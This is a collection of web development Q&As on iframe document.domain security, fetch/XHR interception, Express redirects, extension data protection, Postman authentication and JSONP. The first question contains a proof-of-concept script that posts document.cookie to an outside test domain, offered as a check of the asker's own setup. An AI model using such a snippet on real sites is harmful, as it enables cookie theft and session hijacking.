Security implications of setting document.domain in iframed content

I have two subdomains, content and www, under the domain example.com. Content from content.example.com is presented on www.example.com via an iframe.
Because the content on content.example.com needs to communicate with www.example.com, I've set document.domain = "example.com" and also set allow-scripts and allow-same-origin on the iframe.
I'm concerned that if users can upload the content displayed in the iframe, this could be exploited, e.g. to send the contents of the cookies to a remote domain and hijack the session, or for other attacks.
To test my theory I've set up another domain, www.example2.com, and put an AJAX request in the iframed content on content.example.com that sends document.cookie to the remote domain. This results in the _ga cookies being sent to the remote domain. I've set header('Access-Control-Allow-Origin: *') on the remote domain so the request isn't blocked.
Why are only the _ga cookies being sent? I have a number of other cookies on the same domain and path as the _ga cookies, yet they aren't sent. Are there other security risks in doing this? Ideally I'd like communication to be possible only between content.example.com and www.example.com, and it mostly seems to work that way, except for the Google Analytics cookies, which suggests others might be able to do the same.
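For reference, here's roughly what the test in the framed page looks like (the /collect path on www.example2.com is just a placeholder for my test endpoint):
// Runs inside the iframed page served from content.example.com
document.domain = "example.com";

// Proof of concept: post whatever document.cookie exposes to the unrelated
// test domain, which responds with Access-Control-Allow-Origin: *.
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.example2.com/collect", true);
xhr.send(document.cookie);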

You can use JSONP to communicate between different domains, regardless of cross-domain settings and policies.
However, JSONP requires the server side to build the callback call with the returned data as its parameter.
I would suggest loading plain JavaScript content from the server instead, which has the same cross-domain independence and security as a JSONP request.
Say you have a JavaScript file, data.js, on content.example.com (or a service returning the same content in its response),
containing a JSON object prefixed with a variable assignment:
result = {
    "string1": "text1",
    "object1": {
        "string2": "text2",
        "number1": 5.6
    },
    "number2": 7,
    "array1": ["text3", "text4"]
}
Then, in your web page on www.example.com, you can have a script with a function loadJS,
which loads the server response as a script:
var loadJS = function (url, callback) {
    var script = document.createElement('script');
    script.type = "text/javascript";
    script.src = url;
    script.onload = function (ev) {
        callback(window.result);
        delete window.result;
        this.parentNode.removeChild(this);
    };
    document.body.appendChild(script);
};

window.onload = function () {
    loadJS('http://content.example.com/data.js', function (data) {
        console.log(data);
    });
};
The same function can be used on content.example.com for requests in the opposite direction.
In order to set cookies or perform any other functionality available in JS,
the response script, data.js, may contain a self-invoking function rather than a plain JSON object:
result = (function () {
    // document.cookie must be assigned one cookie at a time.
    document.cookie = "cookie1=Value1";
    document.cookie = "cookie2=Value2";
    return true;
})();

Related

How can I intercept only one endpoint of a domain for my browser API calls?

Suppose I enter a (public) website that makes 3 XHR/fetch calls on 3 different endpoints:
https://api.example.com/path1
https://api.example.com/path2
https://api.example.com/path3
What I want to achieve is intercept the call to https://api.example.com/path2 only, redirect it to a local service (localhost:8000) and let path1 and path3 through to the original domain.
What kind of options do I have here? I have studied a lot of approaches to this issue:
DNS rewriting - not suitable, as I would still have to intercept path1 and path3, redirect them to the original IPs and try to mimic the headers as closely as possible, which means a specific proxy configuration for each intercepted domain - this is unfeasible
Chrome extensions - I found none that deal specifically with intercepting a single endpoint
Overwriting both fetch and XMLHttpRequest after page load - still doesn't cover all scenarios; some websites may capture references to fetch and XMLHttpRequest before page load (?)
Combining a Chrome extension and the fetch overwrite will work.
Download a WebExtension that lets you load JavaScript code before a given page loads, e.g. User JavaScript and CSS.
Add the following script to run before your page loads, based on Intercepting JavaScript Fetch API requests and responses:
const { fetch: originalFetch } = window;

window.fetch = async (...args) => {
    let [resource, config] = args;

    // request interceptor starts
    resource = resource === "https://api.example.com/path2"
        ? "http://localhost:8000/path2"
        : resource;
    // request interceptor ends

    const response = await originalFetch(resource, config);

    // response interceptor here
    return response;
};
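If the site uses XMLHttpRequest instead of fetch, the same idea applies by wrapping XMLHttpRequest.prototype.open before the page's own scripts run (a sketch, using the same placeholder URLs):
const originalOpen = XMLHttpRequest.prototype.open;
XMLHttpRequest.prototype.open = function (method, url, ...rest) {
    // Redirect only the single endpoint; everything else goes through untouched.
    if (url === "https://api.example.com/path2") {
        url = "http://localhost:8000/path2";
    }
    return originalOpen.call(this, method, url, ...rest);
};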

Node.js/Express: how do I redirect to a page on the client, passing some data from the server?

I have this code with a session check and I want to pass data from the server to the client.
I want to display the session name in the lobby.html page,
but I'm new to Node.js/Express and I don't know how.
app.get('/lobby', (req, res) => {
    // check session
    sess = req.session;
    if (sess.name) {
        // redirect to lobby.html passing the session name
    }
    else
        res.sendFile(path.resolve(__dirname, './public/client/error.html'));
});
Redirects are, by definition, GET requests. The ways to get data from one GET request to the next are as follows:
1. Add a query parameter to the URL you're redirecting to and then have the client or the server parse the data out of the query parameter and adjust the content accordingly (see the sketch after this list).
2. Set a custom cookie with the data, then do the redirect and have the client or server pull the data from the cookie on the redirected request.
3. Have the server put some data into the server-side session and have the subsequent redirected request get the data from the session and adjust the content accordingly.
Both #2 and #3 are vulnerable to subtle race conditions: if there are multiple incoming requests, the cookie or session data may get acted upon for some other incoming URL rather than the redirected URL, unless the data also records exactly which URL it is supposed to apply to. Option #1 is not susceptible to that type of race condition.
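A minimal sketch of option #1 for the code in the question, assuming lobby.html is served statically from ./public/client:
app.get('/lobby', (req, res) => {
    const sess = req.session;
    if (sess.name) {
        // Option #1: carry the name in the query string of the redirect target.
        res.redirect('/lobby.html?name=' + encodeURIComponent(sess.name));
    } else {
        res.sendFile(path.resolve(__dirname, './public/client/error.html'));
    }
});
On the client, lobby.html can then read the value back with new URLSearchParams(location.search).get('name') and put it into the page.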
Looks like req.session is populated from the browser, so why not get the name through document.cookie on the browser side directly?

I need to redirect a file from server to a folder without htaccess

I have a file at "website/folder/file" which I would like to redirect, to prevent users from accessing that file, without using .htaccess.
The file is a huge DB containing URLs; I don't want users to be able to reach it by typing its direct URL.
That file is fetched and used by my Chrome extension, which blocks access if the user tries to reach one of the URLs in that DB.
The problem is that by typing the direct URL to that file we have access...
I tried everything with the .htaccess file; I know we can block, redirect, etc. with it, but if I redirect or block the URL of the DB there, my extension doesn't work anymore because the DB is blocked by the .htaccess file.
So I'm trying to find another solution!
My background.js:
'use strict';

let db = []; // session global

// ----- parse & cache the database data
fetch('http://thmywebsite.com/folder/db.dat')
    .then(response => response.text())
    .then(text => { db = text.trim().split(/[\r\n]+/); })
    .catch(error => console.log(error));

chrome.webRequest.onBeforeRequest.addListener(details => {
        let url = new URL(details.url);
        return { cancel: url && url.hostname && db.includes(url.hostname) };
    },
    { urls: ["http://*/*", "https://*/*"] },
    ["blocking"]
);

chrome.extension.isAllowedIncognitoAccess(function (isAllowedAccess) {
    if (isAllowedAccess) return; // Great, we've got access
});
You can't realistically do this. You can't block a resource that needs to be available publicly (by your client-side script).
You can potentially make this a little harder for someone wanting your DB, by perhaps sending a unique HTTP request header as part of your fetch(). You can then check for the presence of this header server-side (in .htaccess) and block the request otherwise. This prevents a user from casually requesting this file directly in their browser. However, this is trivial to bypass for anyone who looks at your script (or monitors the network traffic) as they can construct the request to mimic your script. But let's not forget, your script downloads the file to the browser anyway - so it's already there for anyone to save.
You need to rethink your data model. If you don't want the DB to be publicly accessible then it simply can't be publicly accessible. Instead of your script downloading the DB to the client and processing the request locally, you could send the request to your server. Your server then performs the necessary lookup (on the "hidden" database) and sends back a response. Your script then acts on this response.
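As a rough sketch of that model (the endpoint name is made up), the extension would ask the server instead of downloading db.dat:
// background.js: ask the server whether a hostname is blocked.
// Note: a blocking webRequest listener can't await this, so results would
// need to be prefetched or cached rather than looked up per request.
function isBlocked(hostname) {
    return fetch('https://mywebsite.com/api/check?host=' + encodeURIComponent(hostname))
        .then(response => response.json())
        .then(data => data.blocked)
        .catch(() => false);
}

// server.js (Express): the DB stays on the server, outside the web root.
app.get('/api/check', (req, res) => {
    res.json({ blocked: db.includes(req.query.host) });
});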

Postman Requests Receive an HTTP 401 Status Code

I am working on creating a Node.js REST API, using the Express module, that redirects HTTP GET and PUT requests to another server. However, when running test queries in Postman, I always get HTTP 401 Unauthorized responses, yet when I try the same query in the Chrome browser I get a successful response (HTTP 302). I read through some documentation on the HTTP request/response cycle and authorization. The server I am redirecting to uses HTTP Basic authentication. In my code I redirect the API call to my application server using the res.redirect(server) method. In my Postman request I set the username/password in the Authorization tab. I know this gets encoded using base64, but I am guessing it isn't being passed on the redirect when done through Postman.
The following code snippets show what I've created thus far.
This is the Express route I created for GET requests
app.get('/companyrecords/:name', function (req, res) {
    var credentials = Buffer.from("username:password").toString('base64');
    console.log(req);
    var requestURL = helperFunctions.createURL(req);
    res.redirect(requestURL);
});
I define a function called createURL inside a file called helperFunctions. The purpose of this function is to set up the URL to which requests will be directed. Here is the code for that function:
module.exports.createURL = function (requestURL) {
    var pathname = requestURL._parsedUrl.pathname;
    var tablename = pathname.split("/")[1];
    var filter = `?&filter=name=\'${requestURL.params.hostname}\'`;
    var fullPath = BASE_URL + tablename.concat('/') + filter;
    console.log(fullPath);
    return fullPath;
}
Where BASE_URL is a constant defined in the following form:
http://hostname:port/path/to/resource/
Is there something I need to change in my code to support redirects through Postman, or is there a setting in Postman that I need to change so that my queries can execute successfully?
Unfortunately you can't tell Postman not to do what was arguably the correct thing.
Effectively clients should be removing authorisation headers on a redirect. This is to prevent a man-in-the-middle from sticking a 302 in and collecting all your usernames and passwords on their own server. However, as you've noticed, a lot of clients do not behave perfectly (and have since maintained this behaviour for legacy reasons).
As discussed here, however, you do have some options:
Allow a secondary way of authorising using a query string: res.redirect(302, 'http://appServer:5001/?auth=auth'); however, this is not great because query strings are often logged without redaction.
Act as a proxy and pipe the authenticated request yourself: http.request(authedRequest).on('response', (response) => response.pipe(res)) (see the sketch below).
Respond with a 200 and the link for your client to then follow.
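A minimal sketch of the proxy option, reusing the createURL helper and hard-coded credentials from the question (the exact Express wiring is an assumption):
const http = require('http');

app.get('/companyrecords/:name', (req, res) => {
    const credentials = Buffer.from('username:password').toString('base64');
    const requestURL = helperFunctions.createURL(req);

    // Forward the request ourselves so the Authorization header survives,
    // instead of asking the client to follow a redirect.
    http.get(requestURL, { headers: { Authorization: 'Basic ' + credentials } }, upstream => {
        res.status(upstream.statusCode);
        upstream.pipe(res);
    });
});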

JSONP request working cross-domain, but can't figure out origin

I'm trying out a JSONP call. I have a Node.js app on server 1, under the domain domain1.com, looking like this:
server.get('/api/testjsonp', function (req, res) {
    var clientId = req.param('clientId');
    res.header('Content-Type', 'application/json');
    res.header('Charset', 'utf-8');
    res.send(req.query.callback + '({"something": "rather", "more": "fun", "sourceDomain": "'
        + req.headers.origin + '", "clientId": "' + clientId + '"});');
});
On another server (server 2), under a different domain (domain2.com), I have created a test HTML page with a call like this:
var data = { clientId: 1234567890 };

$.ajax({
    dataType: 'jsonp',
    data: data,
    jsonp: 'callback',
    url: 'https://domain1.com/api/testjsonp?callback=1',
    success: function (data) {
        alert('success');
    },
    error: function (err) {
        alert('ERROR');
        console.log(err);
    }
});
I have 2 problems here:
1) Why is this working? Isn't it a cross-domain call, and therefore wouldn't I need to implement the Access-Control-Allow-Origin header stuff? I'm following these examples:
http://css.dzone.com/articles/ajax-requests-other-domains
http://benbuckman.net/tech/12/04/cracking-cross-domainallow-origin-nut
2) On the server, I can't figure out which domain is making the call; req.headers.origin is always undefined. I'd like to know which domain is calling, to prevent unwanted calls. Alternatively, I could check the calling IP, any idea how?
Many thanks
Why is this working? Isn't it a cross-domain call and therefore I'd need to implement the ALLOW-ORIGIN headers stuff?
As far as the browser is concerned, you aren't directly reading data from a different origin. You are loading a JavaScript program from another origin (and it happens to have some data bundled in it).
In the server, I can't figure out which domain is making the call, req.headers.origin is always undefined. I'd like to be able to know which domain is calling, to prevent unwanted calls.
The URL of the referring page is stored in the Referer header, not the Origin header. It is, however, optional and won't be sent under many circumstances.
If you want to limit access to the data to certain sites, then you can't use JSON-P. Use plain JSON and CORS instead.
Alternatively I could check the calling IP, any idea how?
That would give you the address of the client, not the server that directed the client to you.
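For completeness, a minimal sketch of the CORS alternative on the Node.js side (the endpoint name and allowed origin are examples): instead of wrapping the response in a callback, send plain JSON and name the origin that may read it:
server.get('/api/testjson', function (req, res) {
    // Only pages on https://domain2.com can read this response from a browser.
    res.header('Access-Control-Allow-Origin', 'https://domain2.com');
    res.send({ something: 'rather', clientId: req.query.clientId });
});
The browser then enforces that only scripts running on the allowed origin can read the data; note this restricts browsers, not arbitrary server-to-server requests.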
